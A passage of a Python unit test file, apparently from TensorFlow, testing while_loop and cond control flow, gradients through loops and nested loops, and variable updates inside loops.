self.assertEqual(4, r.eval())
self.assertAllClose(65536.0, v.eval())
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testWhileCondExitControl(self):
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
# Make sure to handle correctly control edge from Exit to a node.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
variables.global_variables_initializer().run()
self.assertEqual(6.0, r.eval())
self.assertEqual(99, v.eval())
def testCondWhile_1(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def _testCondWhile_3(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10., sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
@test_util.disable_control_flow_v2("b/116743589")
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: control_flow_ops.cond(constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
variables.global_variables_initializer().run()
result = r[1].eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_b.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
variables.global_variables_initializer().run()
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
@test_util.disable_control_flow_v2("b/116742472 (resource accumulator)")
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
self.assertEqual(45, rx.eval())
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
# Only forward graph contain gpu in Square device
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
# Forward and backward graphs contain gpu in Square/Square_grad devices
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.session(graph=graph) as sess:
self.assertAllClose(1024.0, sess.run(r))
@test_util.disable_control_flow_v2("b/116351701 (colocation)")
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
self._testNestedWhileCondWhileGrad(use_gpu=True)
@test_util.disable_control_flow_v2("b/116823782")
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
variables.global_variables_initializer().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGradInCond(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116340060")
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testCondGradInNestedWhiles(self):
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = sess.run([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
@test_util.disable_control_flow_v2("b/116255781 (flat_args)")
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
sess.run(r_flattened))
@test_util.disable_control_flow_v2("b/116255781(flat_args)")
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
@test_util.disable_control_flow_v2("b/116355153 (back_prop flag)")
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
variables.global_variables_initializer().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, y_f_d.eval()) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0, g.eval()) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(8.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(256.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
@test_util.disable_control_flow_v2(
"Nested loops and TensorArrays not supported")
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
sess.run(variables.global_variables_initializer())
sess.run(train_op)
self.assertAllClose(2.999, var.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
@test_util.disable_control_flow_v2("b/116272044 (cond_in_while)")
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/116272044 (cond_in_while)")
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
sess.run(variables.global_variables_initializer())
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
sess.run(op)
self.assertAllClose([[0.98000002, 1.98000002]], sess.run(x))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.VariableV1(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
